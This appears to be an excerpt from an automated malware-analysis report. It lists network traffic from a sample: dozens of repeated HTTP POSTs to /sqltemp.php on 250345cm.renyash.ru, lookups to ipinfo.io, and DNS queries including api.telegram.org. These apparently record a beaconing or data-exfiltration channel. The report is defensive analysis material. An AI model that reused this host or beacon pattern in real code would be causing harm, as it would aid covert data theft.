                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1812Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                    Source: global trafficDNS traffic detected: DNS query: 250345cm.renyash.ru
